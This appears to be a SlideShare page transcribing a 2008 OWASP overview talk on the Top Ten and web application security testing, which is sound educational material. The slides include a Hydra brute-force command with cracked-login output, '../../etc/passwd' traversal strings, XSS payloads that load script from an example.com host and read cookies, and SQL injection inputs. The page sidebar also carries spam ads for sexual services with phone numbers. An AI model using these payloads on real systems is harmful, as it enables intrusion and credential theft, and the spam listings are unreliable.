3DTour Brochure
 
Cardea brochure
Cardea brochureCardea brochure
Cardea brochure
 
Contenidos a la Carta Brochure
Contenidos a la Carta BrochureContenidos a la Carta Brochure
Contenidos a la Carta Brochure
 

Dernier

A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAndikSusilo4
 

Dernier (20)

A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & Application
 

Romulus OWASP

  • 1. OWASP OVERVIEW Alberto Pastor Nieto Informática Gesfor March 2008
  • 2. OWASP The Open Web Application Security Project OWASP Top Ten OWASP Testing Guide (Tools demonstration)
  • 3. OWASP The Open Web Application Security Project OWASP Top Ten OWASP Testing Guide (Tools demonstration)
  • 4. OWASP Open community Interested in improving application security Not affiliated with any technology company
  • 5. OWASP The Open Web Application Security Project OWASP Top Ten OWASP Testing Guide (Tools demonstration)
  • 6. OWASP TOP TEN (2007) 1. Cross Site Scripting (XSS) 2. Injection Flaws 3. Malicious File Execution 4. Insecure Direct Object Reference 5. Cross Site Request Forgery (CSRF) 6. Information Leakage and Improper Error Handling 7. Broken Authentication and Session Management 8. Insecure Cryptographic Storage 9. Insecure Communications 10. Failure to Restrict URL Access
  • 7. OWASP The Open Web Application Security Project OWASP Top Ten OWASP Testing Guide (Tools demonstration)
  • 8. Information Gathering Testing Web Application Fingerprint Application Discovery Spidering and Googling SSL/TLS Testing Testing for File Extensions Handling Application Configuration Management Testing Old, Backup and Unreferenced Files
  • 9. Information Gathering Testing Web Application Fingerprint Different servers Different responses Different versions
  • 10. Information Gathering Testing Web Application Fingerprint $ nc 202.41.76.251 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Mon, 16 Jun 2003 02:53:29 GMT Server: Apache/1.3.3 (Unix) (Red Hat/Linux) Last-Modified: Wed, 07 Oct 1998 11:18:14 GMT ETag: "1813-49b-361b4df6" Accept-Ranges: bytes Content-Length: 1179 Connection: close Content-Type: text/html
  • 11. Information Gathering Testing Web Application Fingerprint Tools: NETCRAFT ( http://www.netcraft.com ) httprint ( http://www.net-square.com/httprint/ )
  • 12. Information Gathering Testing Web Application Fingerprint
  • 13. Information Gathering Application Discovery Related issues: Different base URL Non-standard ports Virtual hosts
  • 14. Information Gathering Application Discovery Different base URL: Directory exploration? Google (site:www.example.com) Candidate URLs (Ex. Nessus)
  • 15. Information Gathering Application Discovery Non-standard ports: nmap –P0 –sT –sV –p1-65535 192.168.1.100 Interesting ports on 192.168.1.100: (The 65527 ports scanned but not shown below are in state: closed) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.5p1 (protocol 1.99) 80/tcp open http Apache httpd 2.0.40 ((Red Hat Linux)) 443/tcp open ssl OpenSSL 901/tcp open http Samba SWAT administration server
  • 16. Information Gathering Application Discovery Virtual hosts: $ host -t ns www.owasp.org www.owasp.org is an alias for owasp.org. owasp.org name server ns1.secure.net. owasp.org name server ns2.secure.net. http://searchdns.netcraft.com/?host
  • 17. Information Gathering Spidering and Googling Spidering: wget -r http://www.example.com Googling: googlegath.pl http://www.nothink.org/perl/googlegath/
  • 18. Information Gathering SSL/TLS Testing Vulnerability Scanners: Expired certificates Weak Ciphers ... Other tools: OpenSSL, SSLDigger
  • 19. Information Gathering Testing for File Extensions Handling Identify underlying technologies Tools: wget curl web mirroring tools vulnerability scanners
  • 20. Information Gathering Application Configuration Management Testing Typical files and y directorios conocidos Be careful with HTML comments Personalize Error Pages Only load necessary modules Minimised privileges Access (correct and incorrect) log
  • 21. Information Gathering Old, Backup and Unreferenced Files Site map and technology clues Content clues Practices: look into robots.txt, sitemaps files public information (cache: site:) search files: ~ .old .bak...
  • 22. Information Gathering Old, Backup and Unreferenced Files No use: mod_autoindex y mod_info (Hide unnecessary information) Correctness permisions Use CHROOT Logs recommendations
  • 23. Nessus http://www.nessus.org Port Scanner Vulnerability Scanner
  • 24. Business Logic Testing Automated tools find it hard to understand context People who know logic business Strong data testing
  • 25. Authentication Obtain User Accounts Dictionary attacks Bruteforce attacks Pattern searching attacks
  • 26. Authentication Obtain User Accounts Tools: John the Ripper Hydra Brutus Rainbow Tables
  • 27. Authentication Obtain User Accounts raven@blackbox /hydra $ ./hydra -L users.txt -P words.txt www.site.com https-post-form "/index.cgi:login&name=^USER^&password=^PASS^&login=Login:Not allowed" & Hydra v5.3 (c) 2006 by van Hauser / THC - use allowed only for legal purposes. Hydra (http://www.thc.org)starting at 2009-07-04 19:16:17 [DATA] 16 tasks, 1 servers, 1638 login tries (l:2/p:819), ~102 tries per task [DATA] attacking service http-post-form on port 443 [STATUS] attack finished for wiki.intranet (waiting for childs to finish) [443] host: 10.0.0.1 login: owasp password: password [STATUS] attack finished for www.site.com (waiting for childs to finish) Hydra (http://www.thc.org) finished at 2009-07-04 19:18:34
  • 28. Authentication Bypassing authentication schema • Direct page request • Parameter modification • Session IDs Prediction • SQL Injection
  • 29. Authentication Bypassing authentication schema Tools: WebScarab WebGoat (Trainning)
  • 30. Authentication Directory traversal/file include Known as “dot-dot-slash” 2 evaluation steps: Input vectors enumeration Testing Techniques
  • 31. Authentication Directory traversal/file include Input vectors enumeration: HTTP GET y POST requests File loading HTML forms ...
  • 32. Authentication Directory traversal/file include Testing Techniques: http://example.com/getUserProfile.jsp?item=../../../../etc/passwd Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd http://example.com/index.php?file=http://www.owasp.org/malicioustxt CAREFUL WITH CHARSET!! %2e%2e%2f is ../ %2e%2e/ is ../ %2e%2e%5c is .. ..%2f is ../ %2e%2e is .. ..%5c is ..
  • 33. Authentication Directory traversal/file include Tools: WebScarab Paros Burp Suite
  • 34. Authentication Vulnerable remember password and pwd reset "Security questions": Multiple questions Strong questions Number of attempts CAPTCHA Sending to email
  • 35. Authentication Vulnerable remember password and pwd reset Careful with “Remember password”: <INPUT TYPE="password" AUTOCOMPLETE="off"> If password is into a Cookie: In a hashed form
  • 36. Session Management Logout and Browser Cache Management Testing End Web Session: • The user logs out • The user remains idle for a certain amount of time and the application automatically logs him/her out
  • 37. Session Management Logout and Browser Cache Management Testing KEY: INVALIDATE SERVER-SIDE SESSION Java: HttpSession.invalidate()
  • 38. Session Management Logout and Browser Cache Management Testing Other practices: End session button well visible Invalidate Cookies in client-side
  • 39. Session Management Logout and Browser Cache Management Testing Tools: WebScarab Add N Edit Cookies (Firefox ext) Web Developer (Firefox ext)
  • 40. Session Management Analysis of the Session Management Schema Session Tokens Analysis: Randomless Uniqueness Resistance to statistical analysis Resistance to cryptographic analysis
  • 41. Session Management Cookie and Session Token Manipulation Steps: Cookie Collection Cookie Reverse Engineering Cookie manipulation
  • 42. Session Management Cookie and Session Token Manipulation Tools: WebScarab Cookie Digger
  • 43. Session Management Cross Site Request Forgery (CSRF) Cross-Site Request Forgery (CSRF) describes a way to force an unknowing user to execute unwanted actions on a web application in which he is currently authenticated. Recommended practices: Add session-related information in URLs Use POST Intermediate pages (“Are you sure you really want to do this?”) Use REFERER headers
  • 44. Data Validation XSS (Cross Site Scripting) XSS: Code injection attacks into the various interpreters in the browser. http://server/cgi-bin/testcgi.exe? <SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT> <script src=http://www.example.com/malicious-code.js></script> %3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e x3cscript src=http://www.example.com/malicious-code.jsx3ex3c/scriptx3e Revise all input vectors
  • 45. Data Validation XSS (Cross Site Scripting) Tools: OWASP CAL9000
  • 46. Data Validation SQL Injection Insertion or "injection" of an SQL query via the input data from the client to the application. Example: SELECT * FROM Users WHERE Username='$username' AND Password='$password' Input: $username = 1' or '1' = '1 $password = 1' or '1' = '1 SELECT * FROM Users WHERE Username= '1' OR '1' = '1' AND Password= '1' OR '1' = '1'
  • 47. Data Validation SQL Injection Tools: OWASP SQLIX SQL DUMPER
  • 48. Data Validation Other Injections LDAP Injection (Lightweight Directory Access Protocol) ORM Injection (Hibernate in Java, Nhibernate in .NET, ActiveRecord in Ruby on Rails) XML Injection SSI Injection XPATH Injection IMAP/SMTP Injection System commands Injection
  • 49. Data Validation Buffer overflow Issues caused by buffer overflows: Denial of service (DoS) Code Injection Code execution Practices: Update software Best practices
  • 50. Denial of Service User accounts blocked (Use CAPTCHAs) Buffer overflows User specified object allocation User input as a loop counter User provide data to disk Failure to release resources Store too much data in Session
  • 51. Web Services XML Structural Testing Overloading the XML parser XML Content-level Testing XML/SQL/XPath... Injections Validate Input Size Naugthy SOAP Attachments Testing Man-in-the-middle Testing
  • 52. AJAX Testing Increased attack surface with many more inputs to secure Exposed internal functions of the application Client access to third-party resources with no built-in security and encoding mechanisms Failure to protect authentication information and sessions Blurred line between client-side and server-side code, resulting in security mistakes
  • 53. Useful Tools OWASP Enterprise Security API OWASP Encoding (User Inputs validation) OWASP Stinger (HTTP request validation) OWASP CSRFTester Project
  • 54. Any Question? OWASP http://www.owasp.org Romulus Project http://www.ict-romulus.org